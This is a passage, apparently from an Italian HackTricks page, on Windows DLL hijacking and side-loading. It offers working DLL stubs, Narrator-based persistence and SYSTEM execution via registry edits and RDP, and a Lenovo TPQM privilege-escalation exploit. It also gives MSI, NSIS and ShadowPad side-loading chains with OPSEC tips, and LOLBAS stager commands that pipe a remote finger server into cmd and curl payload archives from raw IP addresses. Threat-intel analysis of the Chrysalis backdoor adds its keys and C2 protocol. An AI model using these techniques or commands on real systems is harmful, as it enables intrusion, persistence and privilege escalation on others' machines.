#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Case Study: Narrator OneCore TTS Localization DLL Hijack (Accessibilità/ATs)

Windows Narrator.exe continua a provare a caricare una DLL di localizzazione prevedibile e specifica per lingua all'avvio che può essere hijacked per arbitrary code execution e persistence.

Key facts
- Percorso ispezionato (build correnti): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Percorso legacy (build più vecchie): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Se esiste una DLL scrivibile controllata dall'attaccante nel percorso OneCore, viene caricata ed esegue `DllMain(DLL_PROCESS_ATTACH)`. No exports are required.

Discovery with Procmon
- Filtro: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Avvia Narrator e osserva il tentativo di caricamento del percorso sopra.

DLL minimale
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

Silenzio OPSEC

• Un hijack ingenuo parlerà/evidenzierà l’UI. Per restare silenziosi, quando si effettua l’attach enumerare i thread di Narrator, aprire il thread principale (OpenThread(THREAD_SUSPEND_RESUME)) e chiamare SuspendThread su di esso; continuare nel proprio thread. Vedi PoC per il codice completo.

Trigger and persistence via Accessibility configuration

• Contesto utente (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Con quanto sopra, avviando Narrator viene caricata la DLL piantata. Sul secure desktop (schermata di accesso), premere CTRL+WIN+ENTER per avviare Narrator; la tua DLL viene eseguita come SYSTEM sul secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Consentire lo strato di sicurezza classico di RDP: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Effettua una connessione RDP all’host; nella schermata di accesso premi CTRL+WIN+ENTER per avviare Narrator; la tua DLL viene eseguita come SYSTEM sul secure desktop (schermata di accesso).
• L’esecuzione si interrompe quando la sessione RDP si chiude—inietta/migra prontamente.

Bring Your Own Accessibility (BYOA)

• Puoi clonare una voce di registro di un Accessibility Tool (AT) integrato (es., CursorIndicator), modificarla per puntare a un arbitrario binario/DLL, importarla, quindi impostare configuration su quel nome AT. Questo fa da proxy per l’esecuzione arbitraria tramite il framework Accessibility.

Note

• Scrivere in %windir%\System32 e modificare valori HKLM richiede privilegi amministrativi.
• Tutta la logica del payload può risiedere in DLL_PROCESS_ATTACH; non sono necessari export.

Caso di studio: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

Questo caso dimostra Phantom DLL Hijacking nel TrackPoint Quick Menu di Lenovo (TPQMAssistant.exe), tracciato come CVE-2025-1729.

Dettagli della vulnerabilità

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Implementazione dell’exploit

Un attaccante può posizionare uno stub hostfxr.dll malevolo nella stessa directory, sfruttando la DLL mancante per ottenere l’esecuzione di codice nel contesto dell’utente:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Flusso d’attacco

1. Come utente standard, posiziona hostfxr.dll in C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Attendi che l’attività pianificata venga eseguita alle 9:30 sotto il contesto dell’utente corrente.
3. Se un amministratore è connesso quando l’attività viene eseguita, la DLL malevola viene eseguita nella sessione dell’amministratore con integrità media.
4. Esegui tecniche standard di UAC bypass per elevare da integrità media a privilegi SYSTEM.

Caso di studio: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Gli attori di minaccia spesso associano dropper basati su MSI con DLL side-loading per eseguire payload sotto un processo firmato e considerato affidabile.

Chain overview

• L’utente scarica un MSI. Una CustomAction viene eseguita silenziosamente durante l’installazione GUI (es., LaunchApplication o un’azione VBScript), ricostruendo la fase successiva da risorse incorporate.
• Il dropper scrive un EXE legittimo e firmato e una DLL malevola nella stessa directory (esempio: wsc_proxy.exe firmato da Avast + wsc.dll controllata dall’attaccante).
• Quando l’EXE firmato viene avviato, l’ordine di ricerca DLL di Windows carica wsc.dll dalla directory di lavoro per prima, eseguendo il codice dell’attaccante sotto un parent firmato (ATT&CK T1574.001).

MSI analysis (what to look for)

• Tabella CustomAction:
• Cerca voci che eseguono eseguibili o VBScript. Esempio di pattern sospetto: LaunchApplication che esegue un file incorporato in background.
• In Orca (Microsoft Orca.exe), ispeziona le tabelle CustomAction, InstallExecuteSequence e Binary.
• Payload incorporati/divisi nel CAB dell’MSI:
• Estrazione amministrativa: msiexec /a package.msi /qb TARGETDIR=C:\out
• Oppure usa lessmsi: lessmsi x package.msi C:\out
• Cerca più frammenti piccoli che vengono concatenati e decrittografati da una CustomAction VBScript. Flusso comune:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Practical sideloading with wsc_proxy.exe

• Metti questi due file nella stessa cartella:
• wsc_proxy.exe: host legittimo firmato (Avast). Il processo tenta di caricare wsc.dll per nome dalla sua directory.
• wsc.dll: DLL dell’attaccante. Se non sono richieste esportazioni specifiche, DllMain può essere sufficiente; altrimenti, crea una proxy DLL e inoltra le esportazioni richieste alla libreria genuina mentre esegui il payload in DllMain.
• Costruisci un payload DLL minimale:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Per i requisiti di export, usa un framework di proxying (es., DLLirant/Spartacus) per generare una DLL di forwarding che esegua anche il tuo payload.

• Questa tecnica si basa sulla risoluzione del nome DLL da parte del binario host. Se l’host usa percorsi assoluti o flag di caricamento sicuro (es., LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), il hijack potrebbe fallire.

• KnownDLLs, SxS e forwarded exports possono influenzare la precedenza e devono essere considerati durante la selezione del binario host e dell’insieme di export.

Signed triads + encrypted payloads (ShadowPad case study)

Check Point ha descritto come Ink Dragon distribuisce ShadowPad usando una triade di tre file per mimetizzarsi con software legittimo mantenendo il payload principale cifrato su disco:

1. EXE host firmato – vendor come AMD, Realtek o NVIDIA vengono abusati (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Gli aggressori rinominano l’eseguibile per farlo sembrare un binario di Windows (per esempio conhost.exe), ma la firma Authenticode rimane valida.
2. Malicious loader DLL – droppata accanto all’EXE con un nome atteso (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). La DLL è di solito un binario MFC offuscato con il framework ScatterBrain; il suo unico compito è localizzare il blob cifrato, decifrarlo e mappare ShadowPad in memoria in modo reflectivo.
3. Blob di payload cifrato – spesso memorizzato come <name>.tmp nella stessa directory. Dopo aver mappato in memoria il payload decifrato, il loader cancella il file TMP per distruggere le evidenze forensi.

Tradecraft notes:

• Rinominare l’EXE firmato (pur mantenendo il OriginalFileName originale nell’header PE) gli permette di fingersi un binario di Windows pur conservando la firma del vendor, quindi replica l’abitudine di Ink Dragon di droppare eseguibili dall’aspetto conhost.exe che in realtà sono utility AMD/NVIDIA.
• Poiché l’eseguibile resta trusted, la maggior parte dei controlli di allowlisting richiedono solo che la tua DLL malevola stia accanto ad esso. Concentrati sul personalizzare il loader DLL; l’eseguibile genitore firmato di solito può essere eseguito senza modifiche.
• Il decryptor di ShadowPad si aspetta che il blob TMP stia accanto al loader e sia scrivibile così da poter azzerare il file dopo il mapping. Mantieni la directory scrivibile fino al caricamento del payload; una volta in memoria il file TMP può essere eliminato in sicurezza per OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Gli operatori abbinano DLL sideloading con LOLBAS in modo che l’unico artefatto custom su disco sia la DLL malevola accanto all’EXE trusted:

• Remote command loader (Finger): PowerShell nascosto lancia cmd.exe /c, preleva comandi da un server Finger e li passa a cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host preleva testo su TCP/79; | cmd esegue la risposta del server, permettendo agli operatori di ruotare il second stage lato server.

• Built-in download/extract: Scarica un archivio con un’estensione benigna, estrailo e metti in staging il target di sideload più la DLL sotto una cartella casuale %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L nasconde il progresso e segue i redirect; tar -xf usa il tar incorporato in Windows.

• WMI/CIM launch: Avvia l’EXE via WMI in modo che la telemetria mostri un processo creato da CIM mentre carica la DLL collocata accanto:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Funziona con binari che preferiscono DLL locali (es., intelbq.exe, nearby_share.exe); il payload (es., Remcos) gira sotto il nome trusted.

• Hunting: Genera alert su forfiles quando /p, /m e /c appaiono insieme; è poco comune al di fuori di script amministrativi.

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Una recente intrusione Lotus Blossom ha abusato di una catena di aggiornamento trusted per consegnare un dropper impacchettato con NSIS che ha messo in staging un DLL sideload oltre a payload eseguiti completamente in memoria.

Flusso operativo

• update.exe (NSIS) crea %AppData%\Bluetooth, lo marca HIDDEN, deposita un Bitdefender Submission Wizard rinominato BluetoothService.exe, una log.dll malevola e un blob cifrato BluetoothService, poi lancia l’EXE.
• L’EXE host importa log.dll e chiama LogInit/LogWrite. LogInit mappa il blob in memoria (mmap); LogWrite lo decritta con uno stream custom basato su LCG (costanti 0x19660D / 0x3C6EF35F, materiale chiave derivato da un hash precedente), sovrascrive il buffer con shellcode in chiaro, libera temporanei e salta ad esso.
• Per evitare un IAT, il loader risolve le API hashando i nomi degli export usando FNV-1a basis 0x811C9DC5 + prime 0x1000193, poi applicando un’avalanche in stile Murmur (0x85EBCA6B) e confrontando con hash target salati.

Shellcode principale (Chrysalis)

• Decripta un modulo principale simile a un PE ripetendo add/XOR/sub con la key gQ2JR&9; per cinque passaggi, poi carica dinamicamente Kernel32.dll → GetProcAddress per completare la risoluzione delle importazioni.
• Ricostruisce le stringhe dei nomi DLL a runtime tramite trasformazioni per carattere bit-rotate/XOR, poi carica oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Usa un secondo resolver che attraversa la PEB → InMemoryOrderModuleList, parsifica ogni export table in blocchi da 4 byte con mixing in stile Murmur, e ricorre a GetProcAddress solo se l’hash non viene trovato.

Embedded configuration & C2

• La config risiede dentro il file BluetoothService droppato all’offset 0x30808 (dimensione 0x980) ed è decrittata RC4 con key qwhvb^435h&*7, rivelando l’URL C2 e lo User-Agent.
• I beacon costruiscono un profilo host delimitato da punti, premettono il tag 4Q, poi lo criptano RC4 con key vAuig34%^325hGV prima di HttpSendRequestA su HTTPS. Le risposte vengono decrittate RC4 e smistate da uno switch basato su tag (4T shell, 4V esecuzione di processo, 4W/4X scrittura file, 4Y lettura/esfiltrazione, 4\\ uninstall, 4 enumerazione drive/file + casi di trasferimento a chunk).
• La modalità di esecuzione è governata dagli argomenti CLI: nessun argomento = installa persistenza (service/Run key) che punta a -i; -i rilancia se stesso con -k; -k salta l’installazione ed esegue il payload.

Alternate loader observed

• La stessa intrusione ha droppato Tiny C Compiler ed eseguito svchost.exe -nostdlib -run conf.c da C:\ProgramData\USOShared\, con libtcc.dll accanto. Il sorgente C fornito dall’attaccante conteneva shellcode embedded, veniva compilato ed eseguito in memoria senza toccare il disco con un PE. Replica con:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Questa fase di compile-and-run basata su TCC ha importato Wininet.dll durante l’esecuzione e ha scaricato uno shellcode di seconda fase da un URL hardcoded, fornendo un loader flessibile che si spaccia per un’esecuzione del compilatore.

Riferimenti

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

• Controlla i piani di abbonamento!
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
• Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.